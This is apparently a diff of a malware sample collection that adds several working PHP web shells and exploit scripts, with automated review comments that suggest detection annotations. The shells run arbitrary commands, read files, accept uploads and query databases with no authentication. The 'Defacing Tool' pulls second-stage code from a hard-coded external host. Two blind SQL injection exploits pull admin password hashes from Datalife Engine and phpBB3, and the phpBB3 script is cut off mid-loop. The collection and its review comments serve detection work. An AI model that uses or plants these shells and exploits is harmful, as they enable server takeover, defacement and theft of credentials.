function kill(){ // Shell deleter function
style();
echo("<form method='post'>");
echo("Type 'confirm' to kill the shell:<br>\n<input type='text' name='ver' action='?act=kill'>");
echo("<input type='submit' value='Delete'>");
echo("</form>");
if($_POST['ver'] == "confirm"){
$self = basename($_SERVER['PHP_SELF']);
if(unlink($self)){echo("Deleted");}
else{echo("Failed");}
}
}
die();
?>


@ -0,0 +1,18 @@
<html>
<head>
<title>G-Security Webshell</title>
</head>
<body bgcolor=#000000 text=#ffffff ">
<form method=POST>
<br>
<input type=TEXT name="-cmd" size=64 value="<?=$cmd?>"
style="background:#000000;color:#ffffff;">
<hr>
<pre>
<? $cmd = $_REQUEST["-cmd"];?>
<? if($cmd != "") print Shell_Exec($cmd);?>
</pre>
</form>
</body>
</html
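Review bot: The execution sink on the `print Shell_Exec($cmd);` line is spelled in mixed case, and nothing in the section records that for whoever derives signatures from this sample. PHP resolves function names case-insensitively, so the call runs as `shell_exec`, and a content rule anchored on the lowercase spelling would not match this file. The value comes from `$_REQUEST["-cmd"]`, and no authentication check is visible anywhere in the section. I would record this beside the sample, in a sidecar note so the sample's bytes and hash stay unchanged: `sink: Shell_Exec() (mixed case); source: $_REQUEST["-cmd"]; auth: none; match function names case-insensitively`.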


@ -0,0 +1,17 @@
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->
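Review bot: The request value reaches the shell through an intermediate variable, `$cmd = ($_REQUEST['cmd']);` followed by `system($cmd);`, so a single-line pattern that expects a superglobal inside the `system(` call does not describe this sample, and the file carries no note saying so. A rule or code-audit query derived from it should follow the assignment, treating any `$_REQUEST` value that reaches a command-execution function as the finding. The `Usage:` line after the closing tag is emitted only when `cmd` is absent, while the leading HTML comment is sent on every request, so both are usable response-body indicators. Suggested annotation: `source: $_REQUEST['cmd'] -> $cmd -> system(); auth: none; response markers: leading "Simple PHP backdoor by DK" comment, "Usage:" line when cmd is unset`.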

71
PHP/Backdoor.PHP.Zonie Normal file

@ -0,0 +1,71 @@
<?
// a simple php backdoor | coded by z0mbie [30.08.03] | http://freenet.am/~zombie \\
ob_implicit_flush();
if(isset($_REQUEST['f'])){
$filename=$_REQUEST['f'];
$file=fopen("$filename","rb");
fpassthru($file);
die;
}
if(isset($_REQUEST['d'])){
$d=$_REQUEST['d'];
echo "<pre>";
if ($handle = opendir("$d")) {
echo "<h2>listing of $d</h2>";
while ($dir = readdir($handle)){
if (is_dir("$d/$dir")) echo "<a href='$PHP_SELF?d=$d/$dir'><font color=grey>";
else echo "<a href='$PHP_SELF?f=$d/$dir'><font color=black>";
echo "$dir\n";
echo "</font></a>";
}
} else echo "opendir() failed";
closedir($handle);
die ("<hr>");
}
if(isset($_REQUEST['c'])){
echo "<pre>";
system($_REQUEST['c']);
die;
}
if(isset($_REQUEST['upload'])){
if(!isset($_REQUEST['dir'])) die('hey,specify directory!');
else $dir=$_REQUEST['dir'];
$fname=$HTTP_POST_FILES['file_name']['name'];
if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fname))
die('file uploading error.');
}
if(isset($_REQUEST['mquery'])){
$host=$_REQUEST['host'];
$usr=$_REQUEST['usr'];
$passwd=$_REQUEST['passwd'];
$db=$_REQUEST['db'];
$mquery=$_REQUEST['mquery'];
mysql_connect("$host", "$usr", "$passwd") or
die("Could not connect: " . mysql_error());
mysql_select_db("$db");
$result = mysql_query("$mquery");
if($result!=FALSE) echo "<pre><h2>query was executed correctly</h2>\n";
while ($row = mysql_fetch_array($result,MYSQL_ASSOC)) print_r($row);
mysql_free_result($result);
die;
}
?>
<pre><form action="<? echo $PHP_SELF; ?>" METHOD=GET >execute command: <input type="text" name="c"><input type="submit" value="go"><hr></form>
<form enctype="multipart/form-data" action="<?php echo $PHP_SELF; ?>" method="post"><input type="hidden" name="MAX_FILE_SIZE" value="1000000000">
upload file:<input name="file_name" type="file"> to dir: <input type="text" name="dir">&nbsp;&nbsp;<input type="submit" name="upload" value="upload"></form>
<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory here]
<br>for example:
http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=/etc on *nix
or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win
<hr>execute mysql query:
<form action="<? echo $PHP_SELF; ?>" METHOD=GET >
host:<input type="text" name="host"value="localhost"> user: <input type="text" name="usr" value=root> password: <input type="text" name="passwd">
database: <input type="text" name="db"> query: <input type="text" name="mquery"> <input type="submit" value="execute">
</form>
<!-- http://michaeldaw.org 2006 -->
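Review bot: The section exposes five separate capabilities keyed on request parameter names, and nothing documents that mapping for log review. From the visible branches: `f` streams a file through `fopen`/`fpassthru`, `d` lists a directory, `c` goes to `system()`, `upload` with `dir` writes an uploaded file, and `mquery` runs SQL with `host`/`usr`/`passwd`/`db` taken from the request. The command form and the MySQL form both declare `METHOD=GET`, so the command text and the database credentials entered there travel in the URL and would normally appear in the web server's access log. Suggested annotation: `// params: f=file read, d=dir listing, c=command exec, upload+dir=file write, mquery(+host,usr,passwd,db)=SQL; c and mquery forms use GET, check access logs`.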

BIN
PHP/Cythosia.7z Normal file

Binary file not shown.

164
PHP/Exploit.PHP.Deftool.a Normal file

@ -0,0 +1,164 @@
<!--
Defacing Tool 1.8 by r3v3ng4ns
revengans@hotmail.com
codigo reescrito
-->
<?php
@closelog();
@error_reporting(0);
$vers="1.8 priv8";
$remote_addr="http://www.cmjn.ce.gov.br/yc/";
$format_addr=".txt";
$cmd_addr=$remote_addr."pro18".$format_addr;
$safe_addr=$remote_addr."safe17".$format_addr;
$writer_addr=$remote_addr."writer17".$format_addr;
$phpget_addr=$remote_addr."get17".$format_addr;
$feditor_addr=$remote_addr."filed".$format_addr;
$put_addr=$remote_addr."filed_put".$format_addr;
$total_addr="http://".$_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'];
if(empty($chdir)) $chdir = $_REQUEST['chdir'];
if(empty($cmd)) $cmd = $_REQUEST['cmd'];
if(empty($fu)) $fu = $_REQUEST['fu'];
if(empty($list)) $list = $_REQUEST['list'];
if(empty($qualMet)) $qualMet = $_REQUEST['qualMet'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
} else if(strpos($cmd, 'chdir .')!==false) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
if(empty($post)){
if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
}
//INFO table (pro and normal)
if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6;
$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
$ip=@gethostbyname($_SERVER['HTTP_HOST']);
//Turns the 'ls' command more usefull, showing it as it looks in the shell
if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
else if($cmd=='ls') $cmd = "ls -F";
//If there are some '//' in the cmd, its now removed
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
?>
<body onload="cmdField.focus();cmdField.select();">
<style>.campo{font-family: Verdana; color:white;font-size:11px;background-color:#414978;height:23px}
.infop{font-family: verdana; font-size: 10px; color:#000000;}
.infod{font-family: verdana; font-size: 10px; color:#414978;}
.algod{font-family: verdana; font-size: 12px; font-weight: bold; color: #414978;}
.titulod{font:Verdana; color:#414978; font-size:20px;}</style>
<script>
function inclVar(){var addr = location.href.substring(0,location.href.indexOf('?')+1);var stri = location.href.substring(addr.length,location.href.length+1);inclvar = stri.substring(0,stri.indexOf('='));}
function enviaCMD(){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu.$showfl;?>+'cmd='+cmdField.value;return false;}
function ativaFe(qual){inclVar();window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfl;?>+'fu='+qual+'&cmd='+cmdField.value;return false;}
function PHPget(){inclVar();var c=prompt("[ PHPget ] by r3v3ng4ns\nDigite a ORIGEM do arquivo (url) com ate 7Mb\n-Utilize caminho completo\n-Se for remoto, use http:// ou ftp://:","http://www.fineca.net/music/");var dir = c.substring(0,c.lastIndexOf('/')+1);var file = c.substring(dir.length,c.length+1);var p=prompt("[ PHPget ] by r3v3ng4ns\nDigite o DESTINO do arquivo\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file);window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$phpget_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'c='+c+'&p='+p);}
function PHPwriter(){inclVar();var url=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite a URL do frame","http://www.geocities.com/revensite/index.htm");var dir = url.substring(0,url.lastIndexOf('/')+1);var file = url.substring(dir.length,url.length+1);var f=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Nome do arquivo a ser criado\n-Utilize caminho completo\n-O diretorio de destino deve ser writable","<?=$chdir;?>/"+file); t=prompt("[ PHPwriter ] by r3v3ng4ns\nDigite o Title da pagina","[ r00ted team ] owned you :P");window.open('<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$writer_addr;?>'+'?&'+'inclvar='+inclvar+'&'<?=$showdir;?>+'url='+url+'&f='+f+'&t='+t);}
function PHPf(){inclVar();var o=prompt("[ PHPfilEditor ] by r3v3ng4ns\nDigite o nome do arquivo que deseja abrir\n-Utilize caminho completo\n-Abrir arquivos remotos, use http:// ou ftp://","<?=$chdir;?>/index.php"); var dir = o.substring(0,o.lastIndexOf('/')+1);var file = o.substring(dir.length,o.length+1);window.open('<?=$total_addr;?>?'+inclvar+'=<?=$feditor_addr;?>?&inclvar='+inclvar+'&o='+o);}
function safeMode(){inclVar();if (confirm ('Deseja ativar o DTool com suporte a SafeMode?')){window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$safe_addr;?>'+'&'<?=$showdir;?>;}else{ return false }}
function list(turn){inclVar();if(turn=="off")turn=0;else if(turn=="on")turn=1; window.document.location.href='<?=$total_addr;?>'+'?'+inclvar+'='+'<?=$cmd_addr;?>'+'?&'<?=$showdir.$showfu;?>+'list='+turn+'&cmd='+cmdField.value;return false;}
function overwrite(){inclVar();if(confirm("O script tentara substituir todos os arquivos (do diretorio atual) que\nteem no nome a palavra chave especificada. Os arquivos serao\nsubstituidos pelo novo arquivo, especificado por voce.\n\nLembre-se!\n-Se for para substituir arquivos com a extensao jpg, utilize\ncomo palavra chave .jpg (inclusive o ponto!)\n-Utilize caminho completo para o novo arquivo, e se for remoto,\nutilize http:// e ftp://")){keyw=prompt("Digite a palavra chave",".jpg");newf=prompt("Digite a origem do arquivo que substituira","http://www.colegioparthenon.com.br/ingles/bins/revenmail.jpg");if(confirm("Se ocorrer um erro e o arquivo nao puder ser substituido, deseja\nque o script apague os arquivos e crie-os novamente com o novo conteudo?\nLembre-se de que para criar novos arquivos, o diretorio deve ser writable.")){trydel=1}else{trydel=0} if(confirm("Deseja substituir todos os arquivos do diretorio\n<?=$chdir;?> que contenham a palavra\n"+keyw+" no nome pelo novo arquivo de origem\n"+newf+" ?\nIsso pode levar um tempo, dependendo da quantidade de\narquivos e do tamanho do arquivo de origem.")){window.location.href='<?=$total_addr;?>?'+inclvar+'=<?=$cmd_addr;?>?&chdir=<?=$chdir;?>&list=1&'<?=$showfu?>+'&keyw='+keyw+'&newf='+newf+'&trydel='+trydel;return false;}}}
</script>
<table width="690" border="0" align="center" cellpadding="2" cellspacing="0" bgcolor="#FFFFFF">
<tr><td><div align="center" class="titulod"><b>[ Defacing Tool Pro v<?=$vers;?> ]<br>
<font size=2>by r3v3ng4ns - revengans@hotmail.com </font>
</b></div></td></tr>
<tr><td><TABLE width="370" BORDER="0" align="center" CELLPADDING="0" CELLSPACING="0">
<?php
$uname = @posix_uname();
while (list($info, $value) = each ($uname)) { ?>
<TR><TD><DIV class="infop"><b><?=$info ?>:</b> <?=$value;?></DIV></TD></TR><?php } ?>
<TR><TD><DIV class="infop"><b>user:</b> uid(<?=$login;?>) euid(<?=$euid;?>) gid(<?=$gid;?>)</DIV></TD></TR>
<TR><TD><DIV class="infod"><b>write permission:</b><? if(@is_writable($chdir)){ echo " <b>YES</b>"; }else{ echo " no"; } ?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>server info: </b><?="$SERVER_SOFTWARE $SERVER_VERSION";?></DIV></TD></TR>
<TR><TD><DIV class="infop"><b>pro info: ip </b><?="$ip, $pro";?></DIV></TD></TR>
<? if($chdir!=getcwd()){?>
<TR><TD><DIV class="infop"><b>original path: </b><?=getcwd() ?></DIV></TD></TR><? } ?>
<TR><TD><DIV class="infod"><b>current path: </b><?=$chdir ?>
</DIV></TD></TR></TABLE></td></tr>
<tr><td><form name="cForm" id="cForm" method="post" action="#" onSubmit="return enviaCMD()">
<table width="375" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#414978"><tr><td><table width="370" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="white"><tr>
<td width="75"><DIV class="algod">command</DIV></td>
<td width="300"><input name="cmdField" type="text" id="cmdField" value='<?=$cmdShow;?>' style="width:295; font-size:12px" class="campo">
</td></tr></table><table><tr><td>
<?php
if(isset($chdir)) @chdir($chdir);
ob_start();
function safemode($what){echo "It seems that this server is using php in safemode. Try to use DTool in Safemode.";}
function popenn($what){$handle=popen("$what", "r");$out=@fread($handle, 2096);echo $out;@pclose($handle);}
function execc($what){exec("$what",$array_out);$out=implode("\n",$array_out);echo $out;}
function shell($what){echo(shell_exec($what));}
$funE="function_exists";
if($funE('passthru')){$fe="passthru";$feshow=$fe;}
elseif($funE('system')){$fe="system";$feshow=$fe;}
elseif($funE('exec')){$fe="execc";$feshow="exec";}
elseif($funE('popen')){$fe="popenn";$feshow="popen";}
elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
else {$fe="safemode";$feshow=$fe;}
if($fu!="" or !empty($fu)){
if($fu==1){$fe="passthru";$feshow=$fe;}
if($fu==2){$fe="system";$feshow=$fe;}
if($fu==3){$fe="execc";$feshow="exec";}
if($fu==4){$fe="popenn";$feshow="popen";}
if($fu==5){$fe="shell";$feshow="shell_exec";}
}
$fe("$cmd 2>&1");
$output=ob_get_contents();ob_end_clean();
?>
<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
<option><?="using $feshow()";?>
<option value="1">use passthru()
<option value="2">use system()
<option value="3">use exec()
<option value="4">use popen()
<option value="5">use shell_exec()
<option value="0">auto detect (default)
</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
</tr></table></td></tr></table></form></td></tr>
<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
<?php
echo $ch_msg;
if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir &lt;diretorio&gt;; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?></TEXTAREA><BR></td></tr>
<?php
if($list=="1") @include($remote_addr."flist".$format_addr);
?>
</table>
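Review bot: The `@include($remote_addr."flist".$format_addr);` line near the end pulls further PHP from the host hard-coded on the `$remote_addr=` line, and the section documents neither that dependency nor those URLs as network indicators. The JavaScript helpers (`inclVar()`, `enviaCMD()`) rebuild the page URL with an existing query parameter set to one of the remote `.txt` addresses, which suggests the tool is meant to be loaded through a remote-include parameter of the hosting application rather than stored on disk (inferred from the script, not stated in it). Both paths depend on PHP fetching and executing a remote URL, so `allow_url_include=Off` is the relevant hardening setting, and access-log entries whose parameter value is an `http://` URL ending in `.txt?` are what to search for. Suggested annotation: `// second stage: remote include from the $remote_addr host (pro18/safe17/writer17/get17/filed/filed_put/flist .txt); record the URLs defanged as IoCs`.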

98
PHP/Exploit.PHP.Inject.e Normal file

@ -0,0 +1,98 @@
<?php
error_reporting (E_ERROR);
ini_set("max_execution_time",0);
echo '
+========================================+
| RST/GHC Datalife SQL injection exploit |
+========================================+
< > Lite Version for DLE <=4.1 < >
';
if ($argc < 2 ){
print " Usage: " . $argv[0] . " <host> <user> [table prefix]\n";
print " ex.: " . $argv[0] . " datalife.engine.net admin\n";
credits();
exit;
}
//DEFINE USER ID
$urla = 'http://' . $argv[1] . '/index.php?subaction=userinfo&user=' . $argv[2];
$result = file_get_contents($urla);
$str1 = 'user='; #index.php?do=pm&doaction=newpm&user=
$position = strpos($result, $str1);
if ($position === false){ print "\n\rSorry, no match found for user " . $argv[2]; credits();}
$str2 = '">';
$pos = strpos($result, $str2, $position);
$pos1 = $position+5;
$user_id = intval(substr($result, $pos1, $pos-$pos1));
print "Trying to get hash for password of user ". $argv[2] ." with id=" . $user_id . ":\n";
//SOME defines (aka CONFIG =))
if (empty($argv[3])){ $prefix = 'dle_';} #define prefix of the tables. try to find it yourself =) it is easy =)
else {$prefix = $argv[3];}
$min = 48; # 0
$max = 122; # z
if (check(">$min", 1) == 0 && check("<$max", 1) == 0) {print "\n Site is unvulnerable..."; credits();}
for ($sn=1; $sn <= 32; $sn++) {
blind($sn, $min, $max);
}
credits();
// REQUEST function
function check($crcheck, $sn)
{
global $argv, $user_id, $prefix;
$host = 'http://' . $argv[1] . '/index.php'; # argv[1] - host
$name = $argv[2]; #user name
$query = '?subaction=userinfo&user=' . $name .'%2527%20and%20ascii(substring((SELECT%20password%20FROM%20' . $prefix. 'users%20WHERE%20user_id='. $user_id .'),' . $sn . ',1))' .$crcheck . '/*'; #
$http = $host . $query;
#DEBUG
#print $http . "\n";
$result = file_get_contents($http);
// checking the answer
$string = ': '.$name.'</h2>'; #CORRECT it FOR your version, kids =)
#good idea is: 'do=pm&doaction=newpm&user='.$user_id;
if (eregi($string, $result)) { return 1; }
return 0;
}
//range function
function blind($sn, $fmin, $fmax)
{
if (($fmax-$fmin)<5) { if (crack($fmin, $fmax, $sn) == 0){print "\n\rEXPLOIT FAILED..."; credits();} return;}
$compare = intval($fmin + ($fmax-$fmin)/2);
$crcheck = ">". $compare;
if ( check($crcheck, $sn) == 1 ) {
blind($sn, $compare, $fmax);
}
else {
blind($sn, $fmin, $compare+1); }
}
//brute function
function crack($cmin, $cmax, $sn)
{
for ($i=$cmin; $i <=$cmax; $i++){
$crcheck = "=$i";
if (check($crcheck, $sn) == 1){print chr($i); return 1;}
}
return 0;
}
function credits(){
print "\n\n+========================================+\n\r Credits: 1dt.w0lf & foster \n\r Copyright (c) RST/GHC";
print "\n\r http://rst.void.ru && http://ghc.ru\n\r+========================================+\n";
exit;
}
?>
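Review bot: The quote in the request built inside `check()` is double-encoded (`%2527`), and nothing in the file says so; a log or WAF rule that URL-decodes the query string once sees `%27` rather than a quote character. That spelling suggests the targeted code path decodes `user` a second time after input filtering, though this is inferred because the target application is not on the page. The traffic shape is also distinctive: `blind()` and `crack()` drive repeated `GET /index.php?subaction=userinfo&user=…` requests for each of 32 character positions, differing only in the trailing comparison. Suggested annotation above `check()`: `// indicator: user= value containing %2527 followed by ascii(substring((SELECT; decode twice before matching`.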

293
PHP/Exploit.PHP.Inject.h Normal file

@ -0,0 +1,293 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "PhpBB 3 memberlist.php/'ip' argument SQL injection / admin credentials disclosure\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork, version specific: \"Powered by phpBB * 2002, 2006 phpBB Group\"\n\n";
/*
works regardless of php.ini settings
you need a global moderator account with "simple moderator" role
*/
if ($argc<5) {
echo "Usage: php ".$argv[0]." host path user pass OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to phpbb3\n";
echo "user/pass: u need a valid user account with global moderator rights\n";
echo "Options:\n";
echo " -T[prefix] specify a table prefix different from default (phpbb_)\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo " -u[number]: specify a user id other than 2 (admin)\n";
echo " -x: disclose table prefix through error messages\n";
echo "Example:\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u\r\n";
echo "php ".$argv[0]." localhost /phpbb3/ rgod suntzu-u-u -TPHPBB_ -u7\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$user=$argv[3];
$pass=$argv[4];
$port=80;
$prefix="PHPBB_";
$user_id="2";//admin
$discl=0;
$proxy="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
if ($temp=="-T")
{
$prefix=str_replace("-T","",$argv[$i]);
}
if ($temp=="-u")
{
$user_id=str_replace("-u","",$argv[$i]);
}
if ($temp=="-x")
{
$discl=1;
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$data="username=".urlencode($user);
$data.="&password=".urlencode($pass);
$data.="&redirect=index.php";
$data.="&login=Login";
$packet="POST ".$p."ucp.php?mode=login HTTP/1.0\r\n";
$packet.="Referer: http://$host$path/ucp.php?mode=login\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: text/plain\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$cookie="";
$temp=explode("Set-Cookie: ",$html);
for ($i=1; $i<=count($temp)-1; $i++)
{
$temp2=explode(" ",$temp[$i]);
$cookie.=" ".$temp2[0];
}
if (eregi("_u=1;",$cookie))
{
//echo $html."\n";//debug
//die("Unable to login...");
}
echo "cookie -> ".$cookie."\r\n";
if ($discl)
{
$sql="'suntzuuuuu";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"You have an error in your SQL syntax"))
{
$temp=explode("posts",$html);
$temp2=explode(" ",$temp[0]);
$prefix=strtoupper($temp2[count($temp2)-1]);
echo "prefix -> ".$prefix."\n";sleep(2);
}
}
$md5s[0]=0;//null
$md5s=array_merge($md5s,range(48,57)); //numbers
$md5s=array_merge($md5s,range(97,102));//a-f letters
//print_r(array_values($md5s));
$j=1;$password="";
while (!strstr($password,chr(0)))
{
for ($i=0; $i<=255; $i++)
{
if (in_array($i,$md5s))
{
$sql="1.1.1.999') UNION SELECT IF ((ASCII(SUBSTRING(USER_PASSWORD,".$j.",1))=$i),$user_id,-1) FROM ".$prefix."USERS WHERE USER_ID=$user_id UNION SELECT POSTER_ID FROM ".$prefix."POSTS WHERE POSTER_IP IN ('1.1.1.999";
echo "sql -> ".$sql."\n";
$sql=urlencode(strtoupper($sql));
$data="username=";
$data.="&icq=";
$data.="&email=";
$data.="&aim=";
$data.="&joined_select=lt";
$data.="&joined=";
$data.="&yahoo=";
$data.="&active_select=lt";
$data.="&active=";
$data.="&msn=";
$data.="&count_select=eq";
$data.="&count=";
$data.="&jabber=";
$data.="&sk=c";
$data.="&sd=a";
$data.="&ip=".$sql;
$data.="&search_group_id=0";
$data.="&submit=Search";
$packet="POST ".$p."memberlist.php?joined_select=lt&active_select=lt&count_select=eq&sk=c&sd=a&ip=%5C%27&form=post&field=username_list&mode=searchuser&form=post HTTP/1.0\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cookie: ".$cookie." \r\n\r\n";
$packet.=$data;
sendpacketii($packet);
